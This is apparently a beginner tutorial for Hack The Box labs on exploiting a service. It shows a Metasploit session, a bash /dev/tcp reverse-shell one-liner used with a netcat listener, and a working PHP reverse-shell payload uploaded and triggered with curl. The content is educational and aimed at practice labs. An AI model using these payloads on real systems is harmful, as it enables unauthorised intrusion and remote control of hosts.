Getting into Hack The Box can be difficult. Let's make it a little bit easier.
Since getting the service versions was a part of the reconnaissance phase, it should be taken advantage of. Google the version of any services you find and see if there are any vulnerabilities. If you’re lucky, there’s a Metasploit module that you can use.
There’s a nice SANS cheatsheet to help use Metasploit.
Here’s an example exploit to put the cheatsheet into perpsective though.
msf5 > search example
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/example_file_upload 2015-09-15 excellent Yes Examlple File Upload Vulnerability
msf5 > use 0
msf5 exploit(multi/http/example_file_upload) > options
Module options (exploit/multi/http/example_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Example 3.1.1
msf5 exploit(multi/http/example_file_upload) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf5 exploit(multi/http/example_file_upload) > set TARGETURI /example/
TARGETURI => /example/
msf5 exploit(multi/http/example_file_upload) > run
[*] Started reverse TCP handler on 10.10.15.1:4444
[*] Sending stage (37543 bytes) to 10.10.10.10
[*] Meterpreter session 1 opened (10.10.15.1:4444 -> 10.10.10.10:56052) at 2020-07-11 20:51:40 -0500
[+] Deleted payload.php
meterpreter > shell
Process 3816 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
If you find a vulnerability on a service, but there isn’t a Metasploit module available,
you might be able to find a proof of concept (PoC) script on Github or Exploit-DB.
More often than not, a PoC script will only give you the ability to send commands to run, which can be slow and cumbersome to use.
The solution to this is setting up a reverse shell.
Utilizing a reverse shell is a three step process
Command Breakdown:
nc: TCP/IP swiss army knife, used to read and write data across network connections
-n: No DNS
-v: Verbose
-l: Listen for inbound connections
-p 4444: Local port to open for connections
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
user@parrot:~$ python3 50180 http://10.10.10.10/example -c "bash -i >& /dev/tcp/10.10.15.1/4444 0>&1"
Example 2.3 - Remote Command Execution
[+] Uploading malicious .zip file: ✓
[+] Executing bash -i >& /dev/tcp/10.10.15.1/4444 0>&1: ✓
[+] Keep breaking ev3rYthiNg!!
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.15.1] 33280
www-data@example:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
If there isn’t a common vulnerability to exploit, then you might want to look for a place to upload files. If you do find a place to upload files, then you should try uploading a PHP reverse shell.
payload.php:
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.15.1/4444 0>&1'");
?>
Once you’ve uploaded the reverse shell, then you can create a netcat listener and trigger the playload.
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
curl it to trigger the reverse shell.
user@parrot:~$ curl http://10.10.10.10/upload/payload.php
user@parrot:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.15.1] 45812
www-data@example:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)